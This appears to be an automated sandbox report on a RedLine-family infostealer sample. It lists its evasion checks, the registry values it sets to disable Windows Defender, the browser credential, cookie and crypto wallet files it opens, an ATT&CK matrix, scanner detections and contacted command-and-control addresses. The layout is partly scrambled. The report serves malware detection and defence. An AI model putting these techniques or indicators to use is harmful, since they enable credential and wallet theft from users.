                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe TID: 5308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe TID: 1848Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe TID: 4836Thread sleep count: 2666 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe TID: 1260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exeJump to dropped file
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWindow / User API: threadDelayed 2666Jump to behavior
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2450
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2575
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2450
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A45467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00A45467
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A42390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A42390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00322390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00322390
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_010D2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: kxL91dA.exe, 00000005.00000002.327812187.0000000000A0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A4202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A4202A
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A46F40 SetUnhandledExceptionFilter,0_2_00A46F40
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A46CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A46CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00326F40 SetUnhandledExceptionFilter,1_2_00326F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00326CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00326CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D6F40 SetUnhandledExceptionFilter,2_2_010D6F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_010D6CF0
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A418A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00A418A3
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A47155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00A47155
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A42BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00A42BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE607CA GetUserNameA,3_2_00007FFBACE607CA

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                          Source: kxL91dA.exe, 00000005.00000002.336955649.0000000005B00000.00000004.00000020.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.327812187.0000000000A0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.0.kxL91dA.exe.4e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.sMt14vz.exe.49fac20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: kxL91dA.exe PID: 3228, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, type: DROPPED
                          Source: Yara matchFile source: 0.3.21fvBVFMsn.exe.4a8da20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.21fvBVFMsn.exe.4a8da20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: Yara matchFile source: Process Memory Space: kxL91dA.exe PID: 3228, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.0.kxL91dA.exe.4e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.sMt14vz.exe.49fac20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: kxL91dA.exe PID: 3228, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, type: DROPPED
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts221
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          21
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          1
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium2
                          Encrypted Channel
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                          System Shutdown/Reboot
                          Default Accounts2
                          Native API
                          1
                          Windows Service
                          2
                          Bypass User Access Control
                          1
                          Obfuscated Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol2
                          Data from Local System
                          Exfiltration Over Bluetooth1
                          Non-Standard Port
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts2
                          Command and Scripting Interpreter
                          Logon Script (Windows)1
                          Access Token Manipulation
                          1
                          Software Packing
                          Security Account Manager1
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                          Application Layer Protocol
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local Accounts1
                          Service Execution
                          Logon Script (Mac)1
                          Windows Service
                          1
                          Timestomp
                          NTDS127
                          System Information Discovery
                          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon Script1
                          Process Injection
                          1
                          DLL Side-Loading
                          LSA Secrets331
                          Security Software Discovery
                          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.common2
                          Bypass User Access Control
                          Cached Domain Credentials11
                          Process Discovery
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                          Masquerading
                          DCSync231
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job231
                          Virtualization/Sandbox Evasion
                          Proc Filesystem1
                          Application Window Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Access Token Manipulation
                          /etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                          Process Injection
                          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                          Rundll32
                          Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 811560 Sample: 21fvBVFMsn.exe Startdate: 19/02/2023 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 7 other signatures 2->51 8 21fvBVFMsn.exe 1 4 2->8         started        11 rundll32.exe 2->11         started        13 rundll32.exe 2->13         started        15 rundll32.exe 2->15         started        process3 file4 39 C:\Users\user\AppData\Local\...\sEm51bM.exe, PE32 8->39 dropped 41 C:\Users\user\AppData\Local\...\nIp99Jf.exe, PE32 8->41 dropped 17 sEm51bM.exe 1 4 8->17         started        process5 file6 31 C:\Users\user\AppData\Local\...\sMt14vz.exe, PE32 17->31 dropped 33 C:\Users\user\AppData\Local\...\lbt58JR.exe, PE32 17->33 dropped 53 Antivirus detection for dropped file 17->53 55 Multi AV Scanner detection for dropped file 17->55 57 Machine Learning detection for dropped file 17->57 21 sMt14vz.exe 1 4 17->21         started        signatures7 process8 file9 35 C:\Users\user\AppData\Local\...\kxL91dA.exe, PE32 21->35 dropped 37 C:\Users\user\AppData\Local\...\ijx54ck.exe, PE32 21->37 dropped 59 Antivirus detection for dropped file 21->59 61 Multi AV Scanner detection for dropped file 21->61 63 Machine Learning detection for dropped file 21->63 25 kxL91dA.exe 5 21->25         started        29 ijx54ck.exe 9 1 21->29         started        signatures10 process11 dnsIp12 43 193.233.20.17, 4139, 49699 REDCOM-ASRedcomKhabarovskRussiaRU Russian Federation 25->43 65 Antivirus detection for dropped file 25->65 67 Multi AV Scanner detection for dropped file 25->67 69 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->69 77 3 other signatures 25->77 71 Machine Learning detection for dropped file 29->71 73 Disable Windows Defender notifications (registry) 29->73 75 Disable Windows Defender real time protection (registry) 29->75 signatures13

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          21fvBVFMsn.exe77%ReversingLabsWin32.Trojan.RedLine
                          21fvBVFMsn.exe56%VirustotalBrowse
                          21fvBVFMsn.exe100%AviraHEUR/AGEN.1252166
                          21fvBVFMsn.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe72%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe69%VirustotalBrowse
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe69%ReversingLabsWin32.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe55%VirustotalBrowse
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe46%ReversingLabsWin32.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe41%VirustotalBrowse
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe69%ReversingLabsWin32.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe85%ReversingLabsByteCode-MSIL.Trojan.Disabler
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe96%ReversingLabsByteCode-MSIL.Trojan.RedLine
                          SourceDetectionScannerLabelLinkDownload
                          0.2.21fvBVFMsn.exe.a40000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          1.0.sEm51bM.exe.320000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          2.2.sMt14vz.exe.10d0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          5.0.kxL91dA.exe.4e0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          1.3.sEm51bM.exe.4756820.0.unpack100%AviraTR/Patched.GenDownload File
                          1.2.sEm51bM.exe.320000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          0.3.21fvBVFMsn.exe.4a8da20.0.unpack100%AviraHEUR/AGEN.1215503Download File
                          0.0.21fvBVFMsn.exe.a40000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          2.0.sMt14vz.exe.10d0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                          http://tempuri.org/0%URL Reputationsafe
                          http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id90%URL Reputationsafe
                          http://tempuri.org/Entity/Id80%URL Reputationsafe
                          http://tempuri.org/Entity/Id50%URL Reputationsafe
                          http://tempuri.org/Entity/Id70%URL Reputationsafe
                          http://tempuri.org/Entity/Id60%URL Reputationsafe
                          http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id22Response00%URL Reputationsafe
                          http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id200%URL Reputationsafe
                          http://tempuri.org/Entity/Id210%URL Reputationsafe
                          http://tempuri.org/Entity/Id220%URL Reputationsafe
                          http://tempuri.org/Entity/Id220%URL Reputationsafe
                          http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id100%URL Reputationsafe
                          http://tempuri.org/Entity/Id100%URL Reputationsafe
                          http://tempuri.org/Entity/Id110%URL Reputationsafe
                          http://tempuri.org/Entity/Id110%URL Reputationsafe
                          http://tempuri.org/Entity/Id120%URL Reputationsafe
                          http://tempuri.org/Entity/Id120%URL Reputationsafe
                          http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id130%URL Reputationsafe
                          http://tempuri.org/Entity/Id140%URL Reputationsafe
                          http://tempuri.org/Entity/Id150%URL Reputationsafe
                          http://tempuri.org/Entity/Id150%URL Reputationsafe
                          http://tempuri.org/Entity/Id160%URL Reputationsafe
                          http://tempuri.org/Entity/Id170%URL Reputationsafe
                          http://tempuri.org/Entity/Id180%URL Reputationsafe
                          http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id190%URL Reputationsafe
                          http://tempuri.org/Entity/Id190%URL Reputationsafe
                          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id4(0%URL Reputationsafe
                          http://tempuri.org/Entity/Id4(0%URL Reputationsafe
                          193.233.20.17:41390%URL Reputationsafe
                          193.233.20.15/dF30Hn4m/index.php0%Avira URL Cloudsafe
                          193.233.20.15/dF30Hn4m/index.php1%VirustotalBrowse
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          193.233.20.17:4139true
                          • URL Reputation: safe
                          unknown
                          193.233.20.15/dF30Hn4m/index.phptrue
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
